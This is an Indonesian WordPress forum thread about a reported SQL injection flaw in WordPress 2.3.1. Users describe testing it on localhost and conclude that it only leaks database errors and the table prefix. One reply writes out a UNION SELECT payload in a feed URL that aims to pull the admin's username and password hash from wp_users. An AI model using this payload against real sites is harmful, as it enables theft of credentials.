Bantuan » Serbaneka » WP 2.3.1 SQL Injection Vulnerability

Melihat 3 balasan - 1 sampai 3 (dari total 3)
  • hah?? duh siap2 upgrade dong

    barusan dah aku coba:

    http://localhost/path_to_wordpress/?feed=rss2&p=1
    

    hasilnya cuma mysql error, ga enaknya table prefix nya keliatan.

    kalo yg ini:

    http://localhost/?feed=rss2&p=(.*)
    

    hasilnya xml feed rss2 semua post entries.

    yg ini:

    http://localhost/?feed=rss2&p=26/**/union/**/select/**/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where/**/user_id=1/*
    

    &p=26 nya udah aku ganti ke sembarang post id, kalau post idnya ga ada *untuk post yg udah di hapus* cuma akan menghasilkan mysql error, sedangkan kalau postnya masih ada, cuma menampilkan xml feed ke komentar pada post itu.

    check lagi ke webnya, katanya statusnya udah diturunkan ke

    information disclosure vulnerability ONLY

    Pencetus Utas stanch

    (@stanch)

    iyah barusan saya cek jg, tp yg rada bikin dag dig dug tu adalah dari hasil error sql tsb yg kalo kita lg “apes” bisa dimanfaatin oleh seseorang yg berotak “brilian” untuk “tindakan selanjutnya” 🙂 …

Melihat 3 balasan - 1 sampai 3 (dari total 3)
  • Topik ‘WP 2.3.1 SQL Injection Vulnerability’ tertutup untuk balasan baru.